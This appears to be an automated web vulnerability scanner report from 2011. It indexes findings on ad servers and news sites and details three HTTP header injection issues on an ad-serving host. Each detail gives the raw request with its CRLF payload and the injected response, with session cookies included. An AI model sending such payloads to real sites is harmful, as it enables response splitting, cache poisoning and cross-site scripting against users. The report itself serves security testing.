11.14. http://www.facebook.com/plugins/likebox.php

11.15. http://www.facebook.com/widgets/like.php

11.16. http://www.youtube.com/embed/TVqe8ieqz10

12. Cross-domain POST

13. Cross-domain Referer leakage

13.1. http://0.tqn.com/0g/js/cj017x14t421p9.js

13.2. http://9.mshcdn.com/wp-content/themes/v7/js/core.js

13.3. http://a.tribalfusion.com/j.ad

13.4. http://a.tribalfusion.com/j.ad

13.5. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5

13.6. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5362797.34

13.7. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends

13.8. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends

13.9. http://ad.doubleclick.net/adi/pcw.main.blogs/bizfeed/index

13.10. http://ad.doubleclick.net/adi/pcw.main.blogs/bizfeed/index

13.11. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article

13.12. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article

13.13. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.13

13.14. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.14

13.15. http://ad.doubleclick.net/adj/cdg.examiner2.national/

13.16. http://ad.doubleclick.net/adj/idgt.data.advertisers/laptops

13.17. http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails

13.18. http://ad.doubleclick.net/adj/mash.to/atf_j_s/tech

13.19. http://ad.doubleclick.net/adj/mash.to/btf_j_s/tech

13.20. http://admeld-match.dotomi.com/admeld/match

13.21. http://ads.pointroll.com/PortalServe/

13.22. http://ads.pointroll.com/PortalServe/

13.23. http://adserving2.cpxinteractive.com/st

13.24. http://arstechnica.com/public/shared/scripts/ad-loader-frame.html

13.25. http://as.casalemedia.com/j

13.26. http://as.casalemedia.com/j

13.27. http://badges.del.icio.us/feeds/json/url/data

13.28. http://bcp.crwdcntrl.net/px

13.29. http://bcp.crwdcntrl.net/px

13.30. http://bidder.mathtag.com/iframe/notify

13.31. http://bidder.mathtag.com/iframe/notify

13.32. http://bidder.mathtag.com/iframe/notify

13.33. http://bidder.mathtag.com/iframe/notify

13.34. http://bwp.zdnet.com/search

13.35. http://choices.truste.com/ca

13.36. http://cm.g.doubleclick.net/pixel

13.37. http://cm.g.doubleclick.net/pixel

13.38. http://cm.g.doubleclick.net/pixel

13.39. http://cm.npc-gatehouse.overture.com/js_1_0/

13.40. http://cm.npc-scripps.overture.com/js_1_0/

13.41. http://googleads.g.doubleclick.net/pagead/ads

13.42. http://googleads.g.doubleclick.net/pagead/ads

13.43. http://googleads.g.doubleclick.net/pagead/ads

13.44. http://googleads.g.doubleclick.net/pagead/ads

13.45. http://googleads.g.doubleclick.net/pagead/ads

13.46. http://googleads.g.doubleclick.net/pagead/ads

13.47. http://googleads.g.doubleclick.net/pagead/ads

13.48. http://googleads.g.doubleclick.net/pagead/ads

13.49. http://ib.adnxs.com/ptj

13.50. http://ib.adnxs.com/seg

13.51. http://loadus.exelator.com/load/

13.52. http://loadus.exelator.com/load/net.php

13.53. http://mads.com.com/mac-ad

13.54. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr

13.55. http://p.brilig.com/contact/bct

13.56. http://p.brilig.com/contact/bct

13.57. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr

13.58. http://rcm.amazon.com/e/cm

13.59. http://shop.mysuburbanlife.com/ROP/portablerop.aspx

13.60. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.61. http://static.arstechnica.net//public/v6/footer.html

13.62. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf

13.63. http://tags.bluekai.com/site/3307

13.64. http://www.chromium.org/chromium-os/comp2jpg

13.65. http://www.dailyfeatures.com/corridor/fodjava.cfm

13.66. http://www.facebook.com/connect/connect.php

13.67. http://www.facebook.com/plugins/activity.php

13.68. http://www.facebook.com/plugins/activity.php

13.69. http://www.facebook.com/plugins/comments.php

13.70. http://www.facebook.com/plugins/like.php

13.71. http://www.facebook.com/plugins/likebox.php

13.72. http://www.facebook.com/widgets/like.php

13.73. http://www.google.com/trends/hottrends

13.74. http://www.google.com/trends/hottrends

13.75. http://www.google.com/trends/hottrends

13.76. http://www.stumbleupon.com/badge/embed/1/

13.77. http://www.stumbleupon.com/badge/embed/5/

13.78. http://www.youtube.com/embed/TVqe8ieqz10

14. Cross-domain script include

14.1. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5

14.2. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5362797.34

14.3. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends

14.4. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article

14.5. http://arstechnica.com/public/shared/scripts/ad-loader-frame.html

14.6. http://bcp.crwdcntrl.net/px

14.7. http://bcp.crwdcntrl.net/px

14.8. http://bidder.mathtag.com/iframe/notify

14.9. http://bidder.mathtag.com/iframe/notify

14.10. http://cdn.optmd.com/V2/80181/197813/index.html

14.11. http://crenk.com/buy-chromebook/

14.12. http://fridaythe13thfilms.com/

14.13. http://g-ecx.images-amazon.com/images/G/01/pda/pda.js

14.14. http://googleads.g.doubleclick.net/pagead/ads

14.15. http://googleads.g.doubleclick.net/pagead/ads

14.16. http://mashable.com/2011/05/11/google-chrome-notebooks/

14.17. http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html

14.18. http://r1-ads.ace.advertising.com/site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649

14.19. http://routenote.com/blog/TFadvertising/300.htm

14.20. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf

14.21. http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm

14.22. http://www.chromium.org/chromium-os

14.23. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

14.24. http://www.dailyfeatures.com/corridor/fodjava.cfm

14.25. http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds

14.26. http://www.facebook.com/connect/connect.php

14.27. http://www.facebook.com/plugins/activity.php

14.28. http://www.facebook.com/plugins/comments.php

14.29. http://www.facebook.com/plugins/like.php

14.30. http://www.facebook.com/plugins/likebox.php

14.31. http://www.facebook.com/widgets/like.php

14.32. http://www.fridaythe13thmovie.com/

14.33. http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/

14.34. http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/

14.35. http://www.imdb.com/images/a/ifb/google_afc_labs.html

14.36. http://www.imdb.com/images/a/ifb/pda_comm2.html

14.37. http://www.imdb.com/title/tt0758746/

14.38. http://www.imdb.com/title/tt0758746/_ajax/footer

14.39. http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/

14.40. http://www.milehighonthecheap.com/wp-content/themes/atahualpa353/images/favicon/cities.ico

14.41. http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th

14.42. http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html

14.43. http://www.pcworld.com/blogs/id,61/bizfeed.html

14.44. http://www.stumbleupon.com/badge/embed/1/

14.45. http://www.stumbleupon.com/badge/embed/5/

14.46. http://www.youtube.com/embed/TVqe8ieqz10

14.47. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

14.48. http://z-ecx.images-amazon.com/images/G/01/pda/ifc._V195103274_.js

15. TRACE method is enabled

15.1. http://admeld-match.dotomi.com/

15.2. http://cache.alluremedia.com.au/

15.3. http://dw.com.com/

15.4. http://dw.zdnet.com/

15.5. http://ping.crowdscience.com/

15.6. http://routenote.com/

15.7. http://tags.bluekai.com/

15.8. http://tenzing.fmpub.net/

15.9. http://www.gizmodo.com.au/

15.10. http://www.pcworld.com/

15.11. http://www.stumbleupon.com/

16. Email addresses disclosed

16.1. http://ads.adbrite.com/adserver/behavioral-data/8201

16.2. http://ads.adbrite.com/adserver/behavioral-data/8203

16.3. http://ads.adbrite.com/adserver/behavioral-data/8203

16.4. http://arstechnica.com/public/shared/scripts/da-1.5.js

16.5. http://bstats.adbrite.com/click/bstats.gif

16.6. http://bstats.adbrite.com/click/bstats.gif

16.7. http://cdn2-b.examiner.com/sites/default/files/js/js_LqkV37b8-egkARv7p97FuP3iNsJGDYwioPZ9WfY1sD0_72.js

16.8. http://fridaythe13thfilms.com/

16.9. http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html

16.10. http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html

16.11. http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/

16.12. http://www.greenfieldreporter.com/assets/scripts/menu/menu.js

16.13. http://www.h-online.com/open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html

16.14. http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/

16.15. http://www.milehighonthecheap.com/wp-content/themes/atahualpa353/images/favicon/cities.ico

16.16. http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th

16.17. http://www.pcworld.com/pcworldconnect/a

16.18. http://www.pubmatic.com/category/blog

16.19. http://www2.warnerbros.com/all/us/omniture/s_code_wbrostheatricaldomesticdvd.js

17. Private IP addresses disclosed

17.1. http://badge.facebook.com/badge/10042561111.528147018.1934312001.png

17.2. http://badge.facebook.com/badge/111279988891248.528147018.678371001.png

17.3. http://crenk.com/favicon.ico

17.4. http://crenk.com/wp-content/plugins/buddypress-share-it/img/buzz.png

17.5. http://crenk.com/wp-content/plugins/buddypress-share-it/img/digg.png

17.6. http://crenk.com/wp-content/plugins/buddypress-share-it/img/email.png

17.7. http://crenk.com/wp-content/plugins/buddypress-share-it/img/share.png

17.8. http://crenk.com/wp-content/plugins/buddypress-share-it/img/tweet.png

17.9. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/60pc_black.png

17.10. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/admin-menu-arrow.gif

17.11. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/sidebar_back.gif

17.12. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/white-grad.png

17.13. http://crenk.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/images/audio_icon.png

17.14. http://crenk.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/images/refresh.png

17.15. http://crenk.com/wp-content/plugins/socialize/images/delicous.png

17.16. http://crenk.com/wp-content/uploads/2010/08/rss.png

17.17. http://crenk.com/wp-content/uploads/2010/08/twitter.png

17.18. http://crenk.com/wp-content/uploads/2010/08/youtube.png

17.19. http://crenk.com/wp-content/uploads/2011/03/android.jpg

17.20. http://crenk.com/wp-content/uploads/2011/03/apple-ipad-2.jpg

17.21. http://crenk.com/wp-content/uploads/2011/03/apple-news.jpg

17.22. http://crenk.com/wp-content/uploads/2011/04/bjkgdru.png

17.23. http://crenk.com/wp-content/uploads/2011/04/crenkwriting1.png

17.24. http://crenk.com/wp-content/uploads/2011/04/header1.png

17.25. http://crenk.com/wp-includes/images/blank.gif

17.26. http://platform.ak.fbcdn.net/www/app_full_proxy.php

17.27. http://platform.ak.fbcdn.net/www/app_full_proxy.php

17.28. http://platform.ak.fbcdn.net/www/app_full_proxy.php

17.29. http://static.ak.fbcdn.net/connect/xd_proxy.php

17.30. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css

17.31. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/8jsqXuInNCS.js

17.32. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/irfZ-ZFdjLY.js

17.33. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/yhiZPPsJHzF.css

17.34. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/-bv7QJTbOXU.css

17.35. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/EEmuV3MlHAh.css

17.36. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uxGNY7N_95r.js

17.37. http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/8OjmYm2TiWI.js

17.38. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/L-db0ALpEr8.js

17.39. http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031

17.40. http://vimeo.com/moogaloop.swf

17.41. http://vimeo.com/moogaloop.swf

17.42. http://vimeo.com/moogaloop.swf

17.43. http://vimeo.com/moogaloop.swf

17.44. http://vimeo.com/moogaloop.swf

17.45. http://vimeo.com/moogaloop.swf

17.46. http://vimeo.com/moogaloop.swf

17.47. http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds

17.48. http://www.facebook.com/ajax/connect/connect_widget.php

17.49. http://www.facebook.com/connect/connect.php

17.50. http://www.facebook.com/extern/login_status.php

17.51. http://www.facebook.com/extern/login_status.php

17.52. http://www.facebook.com/extern/login_status.php

17.53. http://www.facebook.com/extern/login_status.php

17.54. http://www.facebook.com/extern/login_status.php

17.55. http://www.facebook.com/images/fb_logo_small.png

17.56. http://www.facebook.com/images/icons/fbpage.gif

17.57. http://www.facebook.com/plugins/activity.php

17.58. http://www.facebook.com/plugins/activity.php

17.59. http://www.facebook.com/plugins/comments.php

17.60. http://www.facebook.com/plugins/like.php

17.61. http://www.facebook.com/plugins/like.php

17.62. http://www.facebook.com/plugins/like.php

17.63. http://www.facebook.com/plugins/like.php

17.64. http://www.facebook.com/plugins/like.php

17.65. http://www.facebook.com/plugins/like.php

17.66. http://www.facebook.com/plugins/like.php

17.67. http://www.facebook.com/plugins/like.php

17.68. http://www.facebook.com/plugins/like.php

17.69. http://www.facebook.com/plugins/like.php

17.70. http://www.facebook.com/plugins/like.php

17.71. http://www.facebook.com/plugins/like.php

17.72. http://www.facebook.com/plugins/like.php

17.73. http://www.facebook.com/plugins/likebox.php

17.74. http://www.facebook.com/profile/pic.php

17.75. http://www.facebook.com/profile/pic.php

17.76. http://www.facebook.com/widgets/like.php

17.77. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

18. Credit card numbers disclosed

19. Robots.txt file

19.1. http://a.tribalfusion.com/displayAd.js

19.2. http://ad-emea.doubleclick.net/N6514/adj/uk/uk-open

19.3. http://ad.doubleclick.net/adj/ars.dart/ce_gear

19.4. http://admeld-match.dotomi.com/admeld/match

19.5. http://adx.g.doubleclick.net/pagead/adview

19.6. http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

19.7. http://altfarm.mediaplex.com/ad/tr/10759-119438-1104-0

19.8. http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars

19.9. http://b.scorecardresearch.com/beacon.js

19.10. http://b.voicefive.com/b

19.11. http://badges.del.icio.us/feeds/json/url/data

19.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

19.13. http://bwp.zdnet.com/search

19.14. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBanner.js

19.15. http://dw.com.com/rubicsimp/c.gif

19.16. http://dw.zdnet.com/clear/c.gif

19.17. http://feeds.delicious.com/v2/json/urlinfo/data

19.18. http://googleads.g.doubleclick.net/pagead/ads

19.19. http://mads.com.com/mac-ad

19.20. http://mads.zdnet.com/mac-ad

19.21. http://mashable.com/2011/05/11/google-chrome-notebooks/

19.22. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

19.23. http://pubads.g.doubleclick.net/gampad/ads

19.24. http://routenote.com/blog/TFadvertising/300.htm

19.25. http://s.gravatar.com/js/gprofiles.js

19.26. http://service.zdnet.com/wi

19.27. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.28. http://static.crowdscience.com/start-c2e7cdddce.js

19.29. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf

19.30. http://tags.crwdcntrl.net/c/313/cc_af.js

19.31. http://tags.gawker.com/assets/minify.php

19.32. http://www.chromium.org/chromium-os

19.33. http://www.facebook.com/plugins/like.php

19.34. http://www.google-analytics.com/__utm.gif

19.35. http://www.h-online.com/open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html

19.36. http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html

19.37. http://www.reddit.com/button.js

19.38. http://www.stumbleupon.com/hostedbadge.php

19.39. http://www.youtube.com/embed/TVqe8ieqz10

19.40. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

20. HTML does not specify charset

20.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

20.2. http://480-adver-view.c3metrics.com/v.js

20.3. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5

20.4. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5362797.34

20.5. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends

20.6. http://ad.doubleclick.net/adi/pcw.main.blogs/bizfeed/index

20.7. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article

20.8. http://ad.yieldmanager.com/iframe3

20.9. http://ads.pointroll.com/PortalServe/

20.10. http://arstechnica.com/public/shared/scripts/empty.html

20.11. http://aud.pubmatic.com/AdServer/Artemis

20.12. http://bidder.mathtag.com/iframe/notify

20.13. http://bpx.a9.com/amzn/iframe.html

20.14. http://bs.serving-sys.com/BurstingPipe/adServer.bs

20.15. http://cdn-bpx.a9.com/amzn/defaultad.html

20.16. http://cdn-bpx.a9.com/amzn/iframe.html

20.17. http://image3.pubmatic.com/AdServer/UPug

20.18. http://load.exelator.com/load/

20.19. http://loadus.exelator.com/load/net.php

20.20. http://mads.com.com/mac-ad

20.21. http://odb.outbrain.com/utils/ping.html

20.22. http://p.brilig.com/contact/bct

20.23. http://pixel.invitemedia.com/data_sync

20.24. http://showadsak.pubmatic.com/AdServer/AdServerServlet

20.25. http://static.arstechnica.net//public/v6/footer.html

20.26. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf

20.27. http://tags.bluekai.com/site/3307

20.28. http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm

20.29. http://w55c.net/ct/cms-2-frame.html

20.30. http://www.greenfieldreporter.com/favicon.ico

20.31. http://www.imdb.com/images/SF8dcd77f70a5de2a050e47b985a4dfa00/a/js/scriptloader.html

20.32. http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html

20.33. http://www.imdb.com/images/a/ifb/google_afc_labs.html

20.34. http://www.imdb.com/images/a/ifb/pda_comm2.html

20.35. http://www.imdb.com/title/tt0758746/_ajax/footer

20.36. http://z.about.com/6g/ip/284/27.htm

21. HTML uses unrecognised charset

22. Content type incorrectly stated

22.1. http://0.tqn.com/0g/js/cj017x14t421p9.js

22.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

22.3. http://480-adver-view.c3metrics.com/v.js

22.4. http://a1.interclick.com/getInPageJS.aspx

22.5. http://a1.interclick.com/getInPageJSProcess.aspx

22.6. http://ads.pointroll.com/PortalServe/

22.7. http://apptap.scripps.com/apptap3

22.8. http://ar.voicefive.com/b/rc.pli

22.9. http://aud.pubmatic.com/AdServer/Artemis

22.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

22.11. http://cdn.gigya.com/js/gigya.services.socialize.plugins.login.min.js

22.12. http://cdn2-b.examiner.com/sites/all/themes/mvt/favicon.ico

22.13. http://cdn2-b.examiner.com/sites/all/themes/x2/fonts/Museo500-Regular-webfont.woff

22.14. http://cm.npc-gatehouse.overture.com/partner/css/ads.css

22.15. http://crenk.com/favicon.ico

22.16. http://crenk.com/wp-admin/admin-ajax.php

22.17. http://feeds.delicious.com/v2/json/urlinfo/data

22.18. http://hits.nextstat.com/cgi-bin/wsv2.cgi

22.19. http://image3.pubmatic.com/AdServer/UPug

22.20. http://media.courierpress.com/corp_assets/asphalt/_sites/ecp/img/favicon.ico

22.21. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest

22.22. http://ping.crowdscience.com/ping.js

22.23. http://rtb50.doubleverify.com/rtb.ashx/verifyc

22.24. http://service.zdnet.com/wi

22.25. http://shop.mysuburbanlife.com/ROP/portablerop.aspx

22.26. http://showadsak.pubmatic.com/AdServer/AdServerServlet

22.27. http://static.fmpub.net/site/mashable

22.28. http://www.facebook.com/extern/login_status.php

22.29. http://www.facebook.com/profile/pic.php

22.30. http://www.milehighonthecheap.com/wp-content/plugins/anti-captcha/anti-captcha-0.2.js.php

22.31. http://www.mysuburbanlife.com/!/commenting/users/check_status

22.32. http://www.stumbleupon.com/hostedbadge.php

22.33. http://www.zdnet.com/toolbar-service

22.34. http://zapp0.staticworld.net/news/graphics/221051-cr-48_180.png

22.35. http://zapp5.staticworld.net/ad/preview/intel_blog_042011/module/blog_module_top_a_336x560_t.jpg

22.36. http://zapp5.staticworld.net/howto/graphics/162760-drm-free._originaljpeg

23. Content type is not specified

23.1. http://ad.yieldmanager.com/st

23.2. http://www.assoc-amazon.com/s/ads-common.js


1. HTTP header injection  next
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. http://ad.doubleclick.net/ad/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6b223%0d%0a58ef8e18c3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6b223%0d%0a58ef8e18c3b/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel;sz=1x1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6b223
58ef8e18c3b/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel;sz=1x1:
Date: Thu, 12 May 2011 13:29:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
1.2. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.news/products/computers/laptops/article

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1ca5f%0d%0a5ace8b09f35 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1ca5f%0d%0a5ace8b09f35/pcw.main.news/products/computers/laptops/article;blg=bizfeed;pg=article;aid=227430;c=2103;c=2101;c=1732;c=1756;pos=728leader;tile=1;sz=728x90;ord=77720659?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1ca5f
5ace8b09f35/pcw.main.news/products/computers/laptops/article;blg=bizfeed;pg=article;aid=227430;c=2103;c=2101;c=1732;c=1756;pos=728leader;tile=1;sz=728x90;ord=77720659:
Date: Thu, 12 May 2011 13:29:15 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
1.3. http://ad.doubleclick.net/adj/ars.dart/ce_gear [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ars.dart/ce_gear

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 777ac%0d%0afed51a7b09 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /777ac%0d%0afed51a7b09/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=46317853808868680;kw=all;kw=cndeage1824;kw=ltmppmg HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/public/shared/scripts/ad-loader-frame.html?req=http://ad.doubleclick.net/adj/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=46317853808868680
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/777ac
fed51a7b09/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=46317853808868680;kw=all;kw=cndeage1824;kw=ltmppmg:
Date: Thu, 12 May 2011 13:28:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2. Cross-site scripting (reflected)  previous  next
There are 156 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

